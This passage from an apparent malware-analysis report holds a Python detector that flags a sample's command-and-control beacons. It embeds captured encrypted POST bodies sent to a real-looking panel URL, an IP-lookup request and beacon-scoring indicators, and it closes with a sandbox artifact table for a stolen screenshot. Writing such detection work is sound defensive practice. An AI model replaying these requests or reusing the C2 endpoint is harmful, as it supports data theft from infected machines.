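         "Ok4BYWOSchAPQ9Xhckq%2BIllD7imBU/9mp0pt8DTahIO9aEFcQHO%2BVEv0ohap47biDprqlQqmzpyXEr/M/ZVXll"
         "Pgf09svD8fSEnRpoQ%2Boir5cZMIx0R5Wu0lWsIZs=",
    322: "p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1M"
         "fbiT8ZuRlRVcMP5xdr99vcMXlBF1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId"
         "7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuO"
         "zKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q==",
    324: "p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1M"
         "fbiT8ZymcaUfX9lABOPpU0LBSO%2B1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId"
         "7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuO"
         "zKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q==",
    286: "p=G1DZYwdIiDZ6V83seaZCmb3lNHQ9jFz9S1trgT9pB0gEhegVG5AXSLq/eNOcoam8PExE/dGbiFbZdI6uJmXlSdqYLY"
         "uTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ"
         "6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDfxk7Bq%2BMP"
         "IeFuYVGUohcCs=",
}

CAPTURED_POST = ("POST /WebPanel/api.php HTTP/1.1\r\nUser-Agent: " + STATIC_UA + "\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\nHost: newskyinternational.com\r\n"
                 "Content-Length: 314\r\nExpect: 100-continue\r\n\r\n" + BODIES[314])
CAPTURED_GET = "GET / HTTP/1.1\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n"
# Constructed benign form post for contrast (not from the report).
BENIGN_POST = ("POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
               "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 20\r\n\r\n"
               "user=alice&p=hunter2")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def decode_form_blob(body, field="p"):
    """URL-decode then base64-decode one form field; None if absent or not base64."""
    values = urllib.parse.parse_qs(body, keep_blank_values=True).get(field)
    if not values:
        return None
    s = values[0] + "=" * (-len(values[0]) % 4)     # tolerate stripped padding
    try:
        return base64.b64decode(s, validate=True)
    except ValueError:                              # binascii.Error is a ValueError
        return None


def printable_ratio(data):
    return sum(32 <= b < 127 for b in data) / len(data) if data else 0.0


def classify(raw):
    """Score one request against the check-in pattern in the report."""
    method, target, h, body = parse_request(raw)
    blob = decode_form_blob(body) if method == "POST" else None
    ind = {
        "host": h.get("host", ""),
        "ip_lookup": method == "GET" and h.get("host") == "checkip.dyndns.org",
        "static_ua": h.get("user-agent") == STATIC_UA,
        "expect_100": h.get("expect", "").lower() == "100-continue",
        "panel_uri": target.lower().endswith("/api.php"),
        # encrypted payload rather than text: >= 64 bytes and mostly non-printable once decoded
        "opaque_blob": blob is not None and len(blob) >= 64 and printable_ratio(blob) < 0.75,
        "blob_len": len(blob) if blob else 0,
    }
    score = sum(ind[k] for k in ("static_ua", "expect_100", "panel_uri", "opaque_blob"))
    ind["verdict"] = "beacon" if score >= 3 else ("ip-lookup" if ind["ip_lookup"] else "benign")
    return ind


def differing_blocks(body_a, body_b, block=8):
    """Byte offsets of `block`-sized ciphertext blocks that differ between two decoded bodies."""
    a, b = decode_form_blob(body_a), decode_form_blob(body_b)
    return [i for i in range(0, max(len(a), len(b)), block) if a[i:i + block] != b[i:i + block]]


if __name__ == "__main__":
    for label, raw in (("captured POST", CAPTURED_POST), ("captured GET", CAPTURED_GET), ("benign", BENIGN_POST)):
        r = classify(raw)
        print(f"{label:14} {r['host']:24} blob={r['blob_len']:3d} B -> {r['verdict']}")
    for n, body in sorted(BODIES.items()):
        print(f"Content-Length {n}: {len(decode_form_blob(body))} decoded bytes")
    print("8-byte blocks differing between the 322- and 324-byte bodies:", differing_blocks(BODIES[322], BODIES[324]))
```

The four indicators are deliberately independent of the C2 host name, so the same scoring survives a domain change; the host is only reported. For a proxy log rather than a pcap, the same logic applies to the method, URI, User-Agent and Expect header, with the body check dropped.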
File name | screen.jpeg |
---|---|
Related path | C:\Users\test\AppData\Roaming\ScreenShot\screen.jpeg |
File size | 36124 bytes |
File type | JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 800x600, frames 3 |
MD5 | e6b37f111dca68dba5f9e9040d501734 |
SHA1 | 0b80a3316d72fa418ced2b314b33d93f2b585583 |
SHA256 | f0674bd5895d25386962ac7733404f4a6e1f31129bcf9ac6735cf425bc1a2b0a |
CRC32 | 4F6C0213 |
Ssdeep | 768:z+zuvp7Mqt+D03q5KJKintjgtakHOQwdK:z+qvBMqt+D06GtjgtaRK |
Task ID | 171264 |
---|---|
Mongo ID | 5b51d127bb7d57487d05b5a3 |
Cuckoo release | 1.4-Maldun |